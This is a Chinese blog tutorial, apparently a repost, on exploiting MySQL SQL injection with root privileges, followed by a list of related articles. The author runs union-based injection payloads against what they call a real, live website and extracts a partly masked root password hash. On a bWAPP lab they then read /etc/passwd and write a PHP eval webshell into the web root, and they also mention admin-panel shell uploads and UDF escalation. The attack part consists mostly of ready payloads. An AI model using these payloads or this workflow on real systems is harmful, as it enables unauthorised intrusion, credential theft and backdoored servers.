mysql root 权限注入,【sql注入入门 之mysql root权限下的注入利用方式】

最新推荐文章于 2022-12-05 23:39:07 发布
最新推荐文章于 2022-12-05 23:39:07 发布
阅读量240 收藏 1
点赞数
文章标签: mysql root 权限注入

出处:klion's blog

ID:i77169

1,mysql root权限,实例注入点,如下:

560a1736f3e2b19057f41bef75681bf3.png

2,尝试用单引号去干扰vid参数,数据库报错,唉,竟然没顺带一起丢出目标网站的物理路径,差评,嘿嘿……

c963e43cdfc6795798c2c7fe5288fb9c.png

3,尝试闭合

96377ef8a1ace122b6f1c231738ff5d7.png

&vid=192 and 1=112 条件为假时页面返回异常,再次注入点确实存在

f97887414c8a272f7aa7b764eb3e8bdd.png

4,获取当前表的字段个数,为后面union做准备

&vid=192 order by 31 个数为31目标页面返回正常

cc20a0ad6e81e0fe5621bcc32b0b2501.png

&vid=192 order by 32 个数为32时页面返回错误,可知当前表的字段个数为31个

bd071b23692027ef9be69be75f33d3a7.png

5,开始执行union爆出对应的数据显示位

&vid=192 and 1=12 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 %23

f910010f0639c365d76ec828ab9be34a.png

6,搜集数据库信息,如下可知,这是个root权限的注入点,既然是root,那就好办了

&vid=192 and 1=12 UNION SELECT 1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,version(),18,19,20,@@basedir,22,23,24,25,26,27,28,29,30,31 %23

3e88a35f058d14af0c15fe64c004d1e4.png

7,因为是真实站点,我就不瞎动别人东西了,希望大家也养成这样的习惯,不要随意去碰别人的东西,尤其是一些可能存在潜在危险的敏感操作,这里只是单纯查查肯定是没什么问题了,如果是别的就不一定了,(此后的所有的演示说明都是如此,一律点到为止,杜绝’深入探讨’),后面关于读写文件的操作,等会儿都会留在本地做,这里我们就尝试把它的root的密码hash查出来就可以了

&vid=192 and 1=12 UNION SELECT 1,2,3,4,5,user,7,8,9,10,11,12,13,14,15,16,password,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user limit 0,1  %23

67ba826260ecafea4cd7e60cbe9b2662.png

8,最终,得到的root的密码hash如下,如果是实际测试,你还可以顺手telnet下目标的3306,假设目标的mysql能外联,直接用nvaicat连上去操作也许会更方便点

root : *13AC03176D03A9F5C13CB*******

9,这里root权限下的读写操作,就以bwapp中的注入练习为例进行说明了,首先,我们尝试读取目标系统中的/etc/passwd文件,下面的十六进制数据是/etc/passwd hex后的内容

and 1=12 UNION SELECT 1,load_file(0x2ff706173737764),3,4,5,6,7 %23&action=go

133b2f431c7e6f8d915d5c210877aeb0.png

10,依然是上面的注入点,这次我们尝试向目标的网站目录中写入php一句话,下面的十六进制数据的明文是<?php @eval($_POST[‘klion’]);?>,后面则是目标网站的物理路径,意思就是把这个一句话写到这个目录中,如下可以看到,提示不能写,原因很明显,因为以你当前的用户身份对这个目录是没有写权限的,如果想写进去,就只能自己动手去把权限放宽一些,因为这里是在本地测试,权限不够,自己给一下就可以了,但实际测试中,如果没权限,那你就只能看看读,如果读也不能读,mysql的root密码hash总也能查出来吧,再或者如果真的是权限被降的一塌糊涂,网站的管理表总归是可以查的吧,按正常的注入把管理员的账号查出来再登到后台传shell也是可以的

and 1=12 UNION SELECT 1,0x3c3f406576616c28245f504f53545b6b6c696f6e5d293f3e,3,4,5,6,7 into outfile '/var/www/bWAPP/admin/shell.php' %23&action=go

385d21b1feb8f9eb9c50ef0104aaa287.png

可以看到,当我们放开权限之后,shell被正常写进去了,虽然报了点警告,但无伤大雅

and 1=12 UNION SELECT 1,0x3c3f406576616c28245f504f53545b6b6c696f6e5d293f3e,3,4,5,6,7 into outfile '/var/www/bWAPP/admin/shell.php' %23&action=go

细心的表哥们可能会看到,这里的一句话掉了个分号,其实,在php中最后一行代码不加分号是可行的

执行似乎没什么问题,现在尝试用菜刀连一下,脚本正常执行,shell正常连接

关于mysql root权限下的权限利用需要注意的一些点:

(1),正常情况下mysql的root用户确实可以在数据库中为所欲为,但这并不意味着你在目标操作系统中也可以为所欲为,如果启动mysql服务的用户身份只是系统的一个普通用户,那么你在系统中的权限撑死了也就只是个普通用户权限,因为你继承的是那个启动mysql服务的用户权限,说这些只是为了让大家对于mysql root权限下的文件读写利用有个更清晰的认识,大多数时候你会发现,即使你确实是mysql的root用户,但依然没法正常的读写文件,原因就是我上面说的这些,因为你的mysql服务用户只是个普通用户权限,而这个用户对你要操作的那个目录或文件没有读写权限,自然就读写不了,当然,这是基于系统的文件系统权限而言。

(2),另外,还有一种情况,假设你对目标的网站目录有正常的读写权限,但是目标在安装完mysql以后对root用户进行了一些权限优化,比如,我想让root只能正常的增删改查,之外的权限全删掉,这时候,你再想进行文件读写,也可能是不行的,因为file权限很可能被干掉了

(3),最后,还可能会有一些别的情况,比如,网站目录被waf或其他的一些防护工具所监控,当你写webshell时,直接就被杀掉或者报警拦截之类的

(4),退一万步来讲,即使你真的没办法读写文件,但这并不妨碍你正常查询数据,拿到网站管理员的账号密码,登到后台传shell也是可以的,不用一条路走到黑,多变通

(5),其实,有时候也可以利用root用户执行系统命令,即udf,有一种提权方法,叫udf提权,利用的就是此特性,还是那句话,即使能执行系统命令,但这并不意味一定可以达到提权(对于linux来讲是直接提到root权限)的效果,关于udf的东西,我们后续再单独说,这里就暂时先放过

【一点小结】

其实,就mysql本身的文件读写来讲,非常简单,只是背后的权限映射,需要大家稍微理解下,个人觉得挺好理解的,又没什么拐弯抹角的,都是死东西,相信你只要以前好好琢磨过操作系统的用户组权限,这个对你来说,基本是一点就通,在操作系统中,所有的程序,都是工作在某种安全上下文中的,而这个安全上下文大多数都是由用户来控制和决定的,好吧,稍不留神又TM跑题了,汗……

高太爷
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入渗透与攻防(三)之高权限注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-19 348
当多个网站存在一个数据库的时候,root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可以查看所有数据库,还可以对服务器文件进行读写操作。在数据库中区分有数据库系统用户与数据库普通用户,二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
系列2:5、sql注入之高权限注入
qq_44704184的博客
03-25 3883
sql注入之高权限注入 在数据库中区分有数据库系统用户与数据库**普通用户,**二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接,会区分系统用户链接与普通用户链接;当多个网站存在一个数据库的时候.root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可
mysql root权限_Mysql root权限下的注入利用技巧( 一 )
weixin_31067223的博客
01-18 355
虽说是root权限,但这并不意味着,你就可以在目标系统中为所欲为,假如目标的root被降了权,或者你想写shell的目标网站目录都不可写,这时,即使你是root权限,能干的事儿也一样非常的有限,当我们在实战中遇到一个mysql root权限注入点时,想干或者暂时能干的事情无非就下面这些,接下来,会针对每种方法做详细演示: 一、查出目标数据库root的密码然后尝试外连,前提是得目标允许root用户...
mysql注入添加root_sql注入入门mysql root权限下的注入利用方式
weixin_31049801的博客
01-20 298
1,mysql root权限,实例注入点,如下:http://vuln.com/news_view.php?id=9&vid=1922,尝试用单引号去干扰vid参数,http://vuln.com/news_view.php?id=9&vid=192'3,尝试闭合http://vuln.com/news_view.php?id=9&vid=192 and 1=112 条件为...
Mysql注入初体验 Root权限注入及普通用户利用系统表的注入
weixin_34202952的博客
03-03 228
测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://127.0.0.1:8080/show.php?id=2 一. Root权限下的mysql注入 直接在网址后面添加引号http://127.0.0.1:8080/show.php?id=2' 直接爆出为Mysql数据库,使用xo...
MySQL注入之高权限注入
xiao_he0123的博客
03-17 1320
MySQL注入之高权限注入前言二、高权限注入1.什么是高权限注入2.跨库查询思路1.查看用户名2.获取所有的数据库名3.获取指定数据库名下的表名信息4.获取指定damicms下的表名admin下的列名信息4.获取damicms下的admin中的数据 前言 在数据库中有database,schema,table,user,行,列容易被混淆之间的关系 他们之间的关系可以这样理解: database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指
windows下重置mysqlroot密码方法介绍
12-15
我突然意识到,服务器可能遭受到 SQL注入 攻击了…… 至于事故发生的原因和之后所做的补救措施,以后有机会我会聊一聊的。这里我主要讲一下 mysql 用户密码的重置步骤。 重置 root 密码 在忘记 root 密码的情况下,...
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
最新发布
RichUee的博客
12-05 1349
MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
flask mysql sql注入_Python 中如何防止sql注入
weixin_34622572的博客
03-04 1313
前言web漏洞之首莫过于sql了,不管使用哪种语言进行web后端开发,只要使用了关系型数据库,可能都会遇到sql注入攻击问题。那么在Python web开发的过程中sql注入是怎么出现的呢,又是怎么去解决这个问题的?当然,我这里并不想讨论其他语言是如何避免sql注入的,网上关于PHP(博主注:据说是世界上最屌的语言)防注入的各种方法都有,Python的方法其实类似,这里我就举例来说说。起因漏洞产生...
php使用mysql预处理语句防止sql注入 简单讲解及代码实现
AKGWSB 's blog
07-29 2775
前言 最近在做一个小项目的后台,牵扯到登录等等需要操作数据库的地方,为了安全起见,特地来记录一下。 sql注入是一个非常常见的漏洞,可能会带来严重的后果,sql注入漏洞来自于sql查询语句的拼接,攻击者通过非法的输入改写sql语句的语义,以达到攻击者的目的。 sql注入简单介绍 sql注入漏洞来自于sql查询语句的拼接,攻击者通过非法的输入改写sql语句的语义,以达到攻击者的目的。初次听起来很抽象,什么是改写语义呢?我们来举一个简单的例子 总所周知lol里面有一个位置叫做【辅助】,我们有如下语句: 我最喜欢
mysql root 注入_Mysql注入root权限直接写一句话马
weixin_28998851的博客
01-18 174
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来http://localhost/pentest/sql/sql_injection_get.php?id=1发现是root权限,我们尝试直接写马首先要找到网站的主目录:数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\进行判断,服务器可能为wampserver简易版,httpd.conf文件在D...
mysql 普通用户 注入_Mysql注入初体验 Root权限注入及普通用户利用系统表的注入...
weixin_32095133的博客
02-03 300
测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://127.0.0.1:8080/show.php?id=2一. Root权限下的mysql注入直接在网址后面添加引号http://127.0.0.1:8080/show.php?id=2'直接爆出为Mysql数据库,使用xor 1=1 xor 1=2确定为整数型注入;...
mysql root 注入_Mysql root权限下的注入利用技巧( 二 )
weixin_42355570的博客
01-27 172
上一篇,我们详细说明了mysqlroot权限下如何读写文件,开启外连,这次我们就来简单说明如何通过mysql的log功能写shell以及如何利用udf执行系统命令日志写,利用核心利用mysql的general log功能来写shell,其实,核心很简单,当你把这个开关开启以后,它自动把所有执行过的sql语句都记录到一个指定的文件里去,具体怎么利用呢,其实也很简单,由于mysqlroot权限是...
mysql读取权限查看_关于MySQL无file权限root hash的进一步说明
weixin_32334209的博客
01-19 655
转自:http://www.okadwin.com/?post=134看那帖子标题就很喜感有木有,大概意思就是创建了一个没有file权限的账户test,然后不能load file 啥的,但是可以用load data local 这样来读文件的内容到某个表里,然后再select读出来balabala…..一开始以为只有这位大牛这么说,但是后来先后几次看到很多大牛如同得到了MySQL的0day一样,满...
02_SQL注入_Mysql注入_高权限操作&数据读写&简单的防护策略
qq_42171569的博客
04-20 2585
02_SQL注入_Mysql注入_高权限操作&数据读写&简单的防护策略 1.root权限&开发中的权限设置 在实际开发中往往会出现一个网站对应一个数据库,而一个数据库对应一个特定管理员的情况。(假设情景中,开发使用的数据库都是Mysql数据库)。考虑第一个情景:比如A网站对应数据库A,而数据库A对应管理员A,如果存在注入点的情况下,测试出是数据库管理员A的权限在操作该网站数据库A,那么在不获取更高级权限的情况下,只能进行对本网站数据库A的本站注入操作。考虑第二个情景:B网站和C网站部
小迪教程第六天——php+mysql注入权限入侵下部分+疑难杂症
仲夏
10-16 804
1、php+mysql注入主要内容1)爆后台帐号密码(当前数据库) 2)文件读取和导出 3)爆其他数据库下的数据2、爆其他数据库下的数据Mysql 数据库A == A网站 表名 列名 数据 数据库B == B网站 数据库C == C网站数据库A对应的网站A注入点,我们尝试通过网站A的注入点获取数据库BC…数据Mysql跨库注入 1.获取mysql
sql注入mysql权限问题
不想当脚本小子的脚本小子
02-13 441
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
MYSQL-root密码
sda1_hacker的博客
05-14 108
如果忘记了root密码要如何登陆数据库呢? 修改配置文件: vim /etc/my.cnf [mysqld] ... skip_grant_tables=1 #所有的权限都存放在表里,这里表示跳过权限表,可以免密登陆 ... 重启mysql服务后可以直接通过mysql登陆 systemctl restart mysqld mysql #登陆mysql 修改root密码: 数据库用户的信息都放在m...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值